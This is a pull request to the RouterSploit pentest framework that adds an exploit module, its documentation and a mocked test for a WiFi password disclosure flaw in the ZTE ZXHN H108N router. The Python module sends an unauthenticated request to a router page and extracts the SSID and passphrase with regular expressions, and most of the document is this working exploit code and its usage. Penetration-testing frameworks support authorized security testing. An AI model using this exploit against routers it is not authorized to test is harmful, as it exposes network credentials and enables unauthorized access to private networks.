### PR TITLE
Adding ZTE ZXHN H108N Wifi Password Disclosure module

### DIFF
--- a/docs/modules/exploits/routers/zte/zxhn_h108n_wifi_password_disclosure.md
+++ b/docs/modules/exploits/routers/zte/zxhn_h108n_wifi_password_disclosure.md
@@ -1,0 +1,29 @@
+## Description
+
+Module exploits wifi password disclosure vulnerability that allows to retrieve password for wifi connection. 
+
+## Verification Steps
+
+  1. Start `./rsf.py`
+  2. Do: `use exploits/routers/zte/zxhn_h108n_wifi_password_disclosure`
+  3. Do: `set target [TargetIP]`
+  4. Do: `run`
+  5. If device is vulnerable ssid and wifi password is retrieved.
+
+## Scenarios
+
+```
+rsf > use exploits/routers/zte/zxhn_h108n_wifi_password_disclosure
+rsf (ZTE ZXHN H108N Wifi Password Disclosure) > set target 192.168.1.1
+[+] target => 192.168.1.1
+rsf (ZTE ZXHN H108N Wifi Password Disclosure) > run
+[*] Running module exploits/routers/zte/zxhn_h108n_wifi_password_disclosure...
+[+] Target is vulnerable
+[*] Discovered information:
+
+   Parameter     Value
+   ---------     -----
+   SSID Name     SSID Name
+   Password      Password
+
+```

--- a/routersploit/modules/exploits/routers/zte/zxhn_h108n_wifi_password_disclosure.py
+++ b/routersploit/modules/exploits/routers/zte/zxhn_h108n_wifi_password_disclosure.py
@@ -1,0 +1,73 @@
+import re
+from routersploit.core.exploit import *
+from routersploit.core.http.http_client import HTTPClient
+
+
+class Exploit(HTTPClient):
+    __info__ = {
+        "name": "ZTE ZXHN H108N Wifi Password Disclosure",
+        "description": "Module exploits ZTE ZXHN H108N WiFi Password Disclosure vulnerability "
+                       "that allows to retrieve password for wifi connection.",
+        "authors": (
+            "Mostafa Nafady",  # vulnerability discovery
+            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
+        ),
+        "references": (
+            "https://github.com/threat9/routersploit/issues/588",
+        ),
+        "devices": (
+            "ZTE ZXHN H108N",
+        ),
+    }
+
+    target = OptIP("", "Target IPv4 or IPv6 address")
+    port = OptPort(80, "Target HTTP port")
+
+    def run(self):
+        credentials = self.get_credentials()
+        if credentials:
+            print_success("Target is vulnerable")
+
+            ssid, password = credentials
+            creds = [
+                ("SSID Name", ssid),
+                ("Password", password)
+            ]
+
+            print_status("Discovered information:")
+            print_table(("Parameter", "Value"), *creds)
+        else:
+            print_error("Exploit failed - target seems to be not vulnerable")
+
+    def get_credentials(self):
+        response = self.http_request(
+            method="GET",
+            path="/wizard_wlan_t.gch"
+        )
+
+        if response:
+            # get ssid
+            ssid = ""
+            password = ""
+
+            res = [r for r in re.findall(r"Transfer_meaning\('ESSID','(.*?)'\);", response.text) if r]
+            if res:
+                ssid = res[0]
+
+            # get password
+            res = [r for r in re.findall(r"Transfer_meaning\('KeyPassphrase','(.*?)'\);", response.text) if r]
+            if res:
+                password = res[0]
+
+            if ssid or password:
+                return (ssid, password)
+
+        return None
+
+    @mute
+    def check(self):
+        credentials = self.get_credentials()
+        if credentials:
+            return True  # target is vulnerable
+
+        return False  # target is not vulnerable

--- a/tests/exploits/routers/zte/test_zxhn_h108n_wifi_password_disclosure.py
+++ b/tests/exploits/routers/zte/test_zxhn_h108n_wifi_password_disclosure.py
@@ -1,0 +1,60 @@
+from routersploit.modules.exploits.routers.zte.zxhn_h108n_wifi_password_disclosure import Exploit
+
+
+def test_check_succecc(target):
+    """ Test scenario - successful check """
+
+    route_mock = target.get_route_mock("/wizard_wlan_t.gch", methods=["GET"])
+    route_mock.return_value = (
+        "(..)"
+        "<script language=javascript>Transfer_meaning('PreSharedKey','');</script>"
+        "<INPUT type='hidden' name=KeyPassphrase   ID=KeyPassphrase value=''>"
+        "<script language=javascript>Transfer_meaning('KeyPassphrase','');</script>"
+        "<INPUT type='hidden' name=AssociatedDeviceMACAddress   ID=AssociatedDeviceMACAddress value=''>"
+        "<script language=javascript>Transfer_meaning('AssociatedDeviceMACAddress','');</script>"
+        "<script language=javascript>Transfer_meaning('IF_ERRORSTR','SUCC');</script>"
+        "<script language=javascript>Transfer_meaning('IF_ERRORPARAM','SUCC');</script>"
+        "<script language=javascript>Transfer_meaning('IF_ERRORTYPE','\x2d1');</script>"
+        "<script language=javascript>Transfer_meaning('PreSharedKey','');</script>"
+        "<script language=javascript>Transfer_meaning('KeyPassphrase','Password');</script>"
+        "<script language=javascript>Transfer_meaning('AssociatedDeviceMACAddress','00\x3a00\x3a00\x3a00\x3a00\x3a00');</script>"
+        "<script language=javascript>Transfer_meaning('IF_ERRORSTR','SUCC');</script>"
+        "<script language=javascript>Transfer_meaning('IF_ERRORPARAM','SUCC');</script>"
+        "(..)"
+        "<script language=javascript>Transfer_meaning('CardIsIn','1');</script>"
+        "<script language=javascript>Transfer_meaning('MaxInterface','4');</script>"
+        "<script language=javascript>Transfer_meaning('DeviceMode','InfrastructureAccessPoint');</script>"
+        "<script language=javascript>Transfer_meaning('CardMode','b\x2cg\x2cn\x2cbg\x2cgn\x2cbgn');</script>"
+        "<script language=javascript>Transfer_meaning('CardRev','0');</script>"
+        "<script language=javascript>Transfer_meaning('Class','255');</script>"
+        "<script language=javascript>Transfer_meaning('PID','33169');</script>"
+        "<script language=javascript>Transfer_meaning('VID','4332');</script>"
+        "<script language=javascript>Transfer_meaning('ValidIf','1');</script>"
+        "<script language=javascript>Transfer_meaning('Enable','1');</script>"
+        "<script language=javascript>Transfer_meaning('RadioStatus','1');</script>"
+        "<script language=javascript>Transfer_meaning('Standard','b\x2cg\x2cn');</script>"
+        "<script language=javascript>Transfer_meaning('BeaconInterval','100');</script>"
+        "<script language=javascript>Transfer_meaning('RtsCts','2347');</script>"
+        "<script language=javascript>Transfer_meaning('Fragment','2346');</script>"
+        "<script language=javascript>Transfer_meaning('DTIM','1');</script>"
+        "<script language=javascript>Transfer_meaning('TxPower','100\x25');</script>"
+        "<script language=javascript>Transfer_meaning('CountryCode','egI');</script>"
+        "<script language=javascript>Transfer_meaning('TxRate','Auto');</script>"
+        "<script language=javascript>Transfer_meaning('Channel','1');</script>"
+        "<script language=javascript>Transfer_meaning('ESSID','SSID Name');</script>"
+        "<script language=javascript>Transfer_meaning('ESSIDPrefix','');</script>"
+        "<script language=javascript>Transfer_meaning('ACLPolicy','Disabled');</script>"
+        "<script language=javascript>Transfer_meaning('BeaconType','WPAand11i');</script>"
+        "(..)"
+    )
+
+    exploit = Exploit()
+
+    assert exploit.target == ""
+    assert exploit.port == 80
+
+    exploit.target = target.host
+    exploit.port = target.port
+
+    assert exploit.check()
+    assert exploit.run() is None


### PR DESCRIPTION
## Status
**READY**

## Description
This PR adds ZTE ZXHN H108N Wifi Password Disclosure module. It resolves #588 

## Verification
Provide steps to test or reproduce the PR.
  1. Start `./rsf.py`
  2. Do: `use exploits/routers/zte/zxhn_h108n_wifi_password_disclosure`
  3. Do: `set target [TargetIP]`
  4. Do: `run`
  5. If device is vulnerable ssid and wifi password is retrieved.

## Checklist
- [x] Write module 
- [x] Write tests
- [x] Document how it works
